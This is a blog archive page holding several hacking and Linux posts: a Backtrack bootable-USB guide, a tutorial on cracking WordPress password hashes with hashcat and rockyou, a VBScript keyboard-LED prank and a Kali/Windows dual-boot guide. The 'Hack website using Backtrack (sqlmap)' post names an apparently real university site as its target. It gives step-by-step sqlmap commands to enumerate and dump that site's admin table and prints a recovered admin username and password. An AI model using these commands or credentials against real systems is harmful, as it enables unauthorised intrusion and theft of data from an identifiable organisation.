Breaking News

Facebook

Linux

Tools

Others

Showing posts with label Linux. Show all posts
Showing posts with label Linux. Show all posts

Sunday, 26 January 2014

Backtrack 5 bootable usb

Backtrack is based on Ubuntu Lucid (10.04 LTS) with Linux kernel 2.6.38 and some WiFi drivers to allow injection attacks. It is currently most popular choice among hackers for pen testing. It is filled with a collection of more than 3000 open source security tools, which are organised in a real decent way.
It menu consists of several tools like  “Information Gathering”, “Vulnerability Assessment”, “Exploitation Tools”, “Privilege Escalation”, “Maintaining Access”, “Reverse Engineering”, “RFID Tools”, “Stress Testing”, “Forensics”, “Reporting Tools”, “Services”, and “Miscellaneous”.
Alright Lets get start to get hands on such powerful OS:
  • First grab a copy of the latest version of Backtrack. go to the official site click here
  • Click on Download tab, either register your copy or directly click on Download button
  • Then configure the version according to your need and requirement. Click on Download
  • In order to make bootable USB we are going to use a small freewareUNETBOOTIN. Download it from here
  • Take a 4GB USB (recommended) backup all its data and make a QuickFormat using FAT32 File System
  • Now run the application unetbootin
  • Configure it: In Diskimage, select ISO. 
  • Click browse and select the IMAGE which you just downloaded
  •  In Type select USB Drive, Drive select your USB drive letter
  •  Leave the rest as default.
  •  You are always free to configure it in your way :)
  • Click OK
  • Finally the burning process begins. It generally takes 5-10 mins but may take longer depending upon your system configuration.
  • When its done hit the Reboot button of your system.
  • Switch to BIOS and select the USB as First boot device.
  • Viola its done now you can get rid off from Virtual Machine because it slows down the speed in my case. Run the Backtrack directly on your machine.

"The quieter you become, the more you are able to hear"
Read more ...

Thursday, 23 January 2014

How to Decrypt MD5

I will discuss how to Decrypt a password in the form the MD5 hash wordpress.
here are some examples of hash md5 encryption wordpress will we Decrypt:
HASH                                                                                  PASS 
$P$BDHjLCEroc8ujkcs8RZxOhcE80aV5h.           : th3sweety0ne 
$P$BPXNfl3mZiO7PZc4XZqFFjX7TyP7Lh.           : Pabl0-saChez
$P$BqilSln8PD9SBFuTx8KkaXz62aIIvV/             : m4rim4r123
$P$BnfObieGq5ygdt0OMgwbnKvFt8EFUs.          : Gh0stTrac3
$P$B.RwpJQV8ANOyl19RGHhCaYYgJyvQM1  : *12345*0a0b0c0d
many of my friends are overwhelmed when decrypt wordpress md5 hash.
so are they wasting their jobs because they could not solve this one password.Equipments:
1. Hashcat            ==> Decrypt Hash
2. Rockyou.txt      ==> Wordlists
3. Hash-Identifier  ==> to see hash mode
Here I use the Operating System Kali Linux.
First Step :
we see the  kind of hash we will Decrypt. to facilitate us in decryption.
look the picture above it is read as a of MD5 hash wordpress, rigth ?
Next I keep it in the Desktop directory with the name hashMD5.txt
and wordlist that I use is located in the directory /usr/share/wordlists/
The next step lets the Decrypt hash:
root@H2:~# hashcat -m 400 /root/Desktop/hashMD5.txt /usr/share/wordlists/rockyou.txt
Options:
 -m                                               = –hash-type=NUM  –Hash-type, see references below
400                                              = MD5(WordPress)
/root/Desktop/hashMD5.txt     = path hash directory
/usr/share/wordlists/rocyou.txt = path wordlists directory
very awesome, it works 
$P$BDHjLCEroc8ujkcs8RZxOhcE80aV5h.           : th3sweety0ne 
$P$BPXNfl3mZiO7PZc4XZqFFjX7TyP7Lh.           : Pabl0-saChez
$P$BqilSln8PD9SBFuTx8KkaXz62aIIvV/             : m4rim4r123
$P$BnfObieGq5ygdt0OMgwbnKvFt8EFUs.          : Gh0stTrac3
$P$B.RwpJQV8ANOyl19RGHhCaYYgJyvQM1  : *12345*0a0b0c0d
NOTE : if your wordlist do not work, please make a wordlist using Crunch
Good luck.
Read more ...

Wednesday, 22 January 2014

Keyboard Dancing Led Light Tricks



1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

2. Then save this file as led.vbs (.vbs is must)
3. Open your save file and see your keyboard led blinking like disco lights.


you can stop it by opening the task manager---> process and look for the "wscript.exe" without quote, then stop process.
Read more ...

Tuesday, 14 January 2014

Hack website using Backtrack (sqlmap)

In my previous tutorial I have explained what is backtrack, now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.


Sqlmap is developed in Python and it is available with Backtrack 5 and Backtrack 5 R1 and all versions of Backtrak, Otherwise you can download seperately also from

$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

Sqlmap is is best sql injection tool.

With sqlmap we can know the database name and type of database i.e,Mysql or SqlServer or ........ and we can find the database name and tables related to that database and we can dump the data from the database.
It is totally a database takeover tool

Steps:

1.First we require the vulnerable target and here it is

http://www.hu.edu.pk/viewfaculty.php?id=12

2.Go to Backtrack and type cd /pentest/database/sqlmap




3.Run the sqlmap

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12

-u is the vulnerable url



./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs

or

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db




if you write as --dbs then it will fetch all the databases in the server

and if you write --current-db then it will fetch only the database related to the current website

we will get the database name

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables



Here after -D we have to give the database name

--tables means we are trying to fetch the tables in the current database

and we will get the table names



after that we have to fetch only the table information which we required

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns

we will get the names of columns in that table with datatype





./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name --dump



now we will get the total information in the table "admin"






After finishing all the process you r having




Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123


tehn, all you need to do is to find the admin panel.
Read more ...

Dual Boot Kali Linux with Windows

The most advanced penetration testing distribution, ever.

From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created. BackTrack has grown far beyond its humble roots as a live CD and has now become a full-fledged operating system.

Preparing for the Installation

  1. Download Kali Linux.
  2. Burn The Kali Linux ISO to DVD or copy Kali Linux Live to USB.
  3. Ensure that your computer is set to boot from CD / USB in your BIOS.
The objective here is to show how to install it on an HDD alongside an existing installation of Windows 7, with the Windows 7 boot manager as the “master” boot loader, so that at the end, when the computer is (re)booted, you will be presented with a boot menu that looks just like the one shown below. Selecting Windows 7 boots the system into Windows 7 and choosing Kali Linux will, by default, take you to the Kali Linux boot menu, which is the same thing as the GRUB 2 menu, the version of GRUB used by Kali Linux.
Windows 7 Dual-boot Menu
To bypass Kali Linux’s boot menu, simply edit the file named /etc/default/grub and change GRUB_TIMEOUT=5 to GRUB_TIMEOUT=0. Then run the update-grub command.
Kali Linux Windows 7 GRUB 2
Now that we know what to do, and what the result will be, let’s get it done. If you have not done so already, download an installation image of Kali Linux from here.
1. Shrink the Windows 7 C Drive: My test system has an existing installation of Windows 7 on a 500 GB HDD, with just two primary partitions. This is how they appear in Windows 7′s partition manager. The task here is to shrink the C drive to create room for installing Kali Linux. To do that, right-click on the C drive and select Shrink Volume.
Note: If you intend to install Windows 7 afresh, this process will be a lot easier if you set aside the free space that will be used for Kali Linux during the installation of Windows 7.
Windows 7 Partitions
If you have enough free space on the C drive, the system will suggest a 50-50 split of the free space. Which is just good enough for this test installation. Shrink.
Windows 7 Shrink Partitions
After the operation has completed, you should see the newly reclaimed space next to the C drive. You may exit the partition manager and reboot the computer. Be sure to have the installation disc of Kali Linux in the optical drive before rebooting.
Windows 7 Partitions
2. Install Kali Linux: The best option to select on Kali Linux’s boot menu is Graphical Install. It gives you a point-and-click installation process. Install works just as well, but the interface is ncurses-based.
Kali Linux Boot Menu
For installing Kali Linux, the following partitions will be created: /boot, /, /home, and Swap. In that order. The /home partition is optional. At the disk partitioning methods step of the installation process, you get a bunch of options. Because none of the guided options will create a separate /boot partition, creating the partitions will have to be done manually. So select “Manual” and click Continue.
Kali Linux Debian Installer
Here you can see the existing Windows 7 partitions, both of which are primary partitions. The free space, reclaimed from Windows 7 in the previous step is what will be used for creating the partitions for Kali Linux. To start creating the partitions, select the free space and click Continue.
Kali Linux Create Partition
Create a new partition. Continue.
Dual-boot Windows 7 and Kali Linux
This shows the total amount of disk space available for Kali Linux. The /boot partition will be created first, so you need to specify the amount of disk space for it.
Kali Linux Create Partition size
For this test system, I assigned 300 MB to it. Continue.
Dual-boot Windows 7 and Kali Linux
Because you still have two primary partitions to use, you can create the boot partition as a primary or logical partition. Either option will work, but the installer prefers creating it as a primary partition, if the boot loader is going to be installed in it. For this test installation, I chose to create it as a logical partition. Continue.
Dual-boot Windows 7 and Kali Linux
Beginning. Continue.
Kali Linux Create Partition size
This step shows the details of the boot partition you just created. The only thing you need to change here is the mount point. Double-clicking on it will open another window where you can specify the correct mount point.
Dual-boot Windows 7 and Kali Linux
Here’s what it should look like after the mount point has been specified. The other option you might want to change here is the Bootable flag.
Kali Linux
There is a good reason it should be enabled, but the system will boot even if it is disabled. It just depends on your BIOS version. For this test installation, it was disabled and the system still worked perfectly.
Dual-boot Windows 7 and Kali Linux
Here’s the final details of the boot partition. Scroll to “Done setting up the partition,” then click Continue. Note that the steps you used to create the boot partition will be repeated for the other partitions.
Kali Linux
Back to the main disk partitioning window, you can see the boot partition you just created, plus the remaining free space. Select, the free space, then click Continue.
Kali Linux

The next partition will be mounted at /. A new installation of Kali Linux takes up about 6.4 GB of disk space, so any amount greater than that will do. For the test installation, I gave it 60 GB, which is way too much, so you do not have to do the same. About 10-12 GB is more than enough. Continue.
Dual-boot Windows 7 and Kali Linux
Here are the details of the new partition. Scroll to “Done setting up the partition,” then click Continue.
Dual-boot Windows 7 and Kali Linux
For the home partition, I gave it a disk space of 100 GB. Continue.
Kali Linux 1.0
Here are the details of the new partition. Scroll to “Done setting up the partition,” then click Continue.
Dual-boot Windows 7 and Kali Linux
For Swap, 2 GB is good enough. Continue.
Dual-boot Windows 7 and Kali Linux
Here are the default details of the new partition. To specify that it be used as a Swap partition, double-click the “Use as” line.
Kali Linux
Then select “swap area.” Continue.
Kali Linux Windows 7 dual-boot
Scroll to “Done setting up the partition,” then click Continue.
Kali Linux dual-boot Windows 7
With all the partitions created, scroll to “Finish partitioning and write changes to disk.” Continue. Make note of the device number of the boot partition. Here, it is sda5. You’ll need it later.
Dual-boot Windows 7 and Kali Linux
Select “Yes.” Continue.
Dual-boot Windows 7 and Kali Linux
By default, the installer will want to install GRUB, the boot loader, in the Master Boot Record (MBR). However, for setting up this dual-boot system, we want GRUB in the boot partition. So, select “No.” Continue.
Dual-boot Windows 7 and Kali Linux
This is where you have to specify where GRUB should be installed. For this test system, it is /dev/sda5. Continue.
Dual-boot Windows 7 and Kali Linux
After installation, the computer will reboot into Windows 7. The next task involves add an entry for Kali Linux in Windows 7′s boot menu.
3. Add Kali Linux to Windows 7′s boot menu: The simplest graphical application for modifying the Boot Configuration Data of Window that I know, is EasyBCD. It is free for personal use. You may download it from here. Install it as you would any other Windows application. The main window is shown below. To add an entry for Kali Linux in the boot menu, click on the Add New Entry tab.
Windows 7 EasyBCD
Then click on the Linux/BSD tab. From the Type dropdown menu, select GRUB 2. Modify the name field to reflect the name of the distribution you are adding. From the Drive menu, you can either select the specific partition corresponding to the boot partition of the Kali Linux installation or let EasyBCD automatically locate and load it. Either one will work. Note that EasyBCD’s drive numbers and the device numbers of the Linux partitions do not match. For example, in this test installation, the boot partition is /dev/sda5, but the corresponding drive number in EasyBCD is Partition 3. The size of the partition helps to determine which one it is. Click the Add Entry button when wll the options have been specified.
Windows 7 EasyBCD Linux GRUB 2
From the Edit Boot Menu tab, you can see a preview of the entries that will appear in the Windows 7 boot menu. Exit EasyBCD and reboot the computer. That should do it.
Windows 7 Kali Linux EasyBCD Preview
Extra: Here are all the partitions on the HDD as seen from the Windows 7 partition manager.
Windows 7, Kali Linux Partitions

Read more ...
© Geek Tricks by Aletheia | Designed By